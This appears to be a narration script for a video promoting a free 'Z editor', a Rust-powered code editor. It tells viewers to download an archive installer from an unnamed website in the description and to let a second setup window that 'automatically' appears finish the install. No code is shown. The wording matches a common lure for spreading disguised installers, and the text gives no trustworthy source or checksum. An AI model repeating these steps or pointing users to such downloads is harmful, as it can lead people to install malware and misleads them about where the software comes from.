Hello, tired of bloated, heavy code editors that eat up all your RAM and lag on large project files? Today we are deploying a fully optimized Z editor to lock in a lightning-fast, Rust-powered development workspace for zero cost. Let's get it ready. First, head down to the description and download the archive installer directly from our website, run the setup file, click next, and let the utility quickly extract the core workspace deployment package onto your drive. Once the baseline finishes, a second setup window will automatically pop up on your screen. Just follow the built-in wizard prompts to finalize the main application install and map out the core components. Now, fire up the main program shortcut from your desktop to evaluate the active interface. Let the Start dashboard initialize completely to ensure the ultra lightweight workspace and themes load up with zero lag. Your high-speed code rendering station is completely installed, calibrated, and ready for your development projects. Head over to our website right now to claim your files and start building code like a boss.